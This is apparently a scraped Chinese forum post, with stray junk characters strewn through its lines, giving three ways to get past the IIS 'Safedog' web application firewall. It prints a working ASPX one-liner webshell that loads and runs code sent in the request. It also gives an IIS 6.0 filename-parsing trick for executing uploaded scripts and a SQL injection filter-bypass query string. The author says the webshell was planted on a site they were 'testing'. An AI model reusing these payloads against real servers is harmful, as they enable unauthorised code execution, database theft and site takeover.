1、绕过IIS安全狗的一句话。# Z& Y/ x. `$ {0 @
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。. p$ A |% E& t- I4 L K
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
- h# C7 [5 z) T! D2 q& ~, g9 P4 f& s* p3 L5 u
2、IIS6.0解析漏洞遇到安全狗。/ N- M: J! {+ }& A7 i" A4 J
文件名为
. R; d. @' e$ _" D, `/ I, c Shttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
$ F0 g+ y! B# g/ f: X v- r
8 D* U \ S$ J& w7 N这样的会被IIS安全狗果断屏蔽。$ q0 e$ \$ Y9 g D* J- f
改成如下名称,IIS6一样会解析:
4 d; h7 w8 o6 `# }9 h5 ywww.xxxxx.com/;1.asp;1.jpg
: h; [% i4 j: U# f% }! H$ y8 M6 l) N- m
3、安全狗的注入绕过。; N4 n4 e" o3 v; S0 Y
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。- F$ s2 b+ N* f: B8 ]7 N
但如果:! S2 q5 r: v! c8 t7 q% O
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=18 p. e M* e& l y
就可以成功绕过了。8 V- q$ H! [( S4 H4 s# L+ i3 S. R+ F
' K: [- G( _" W3 Z
5 K5 ]: i7 t" e- U3 e8 o; Z |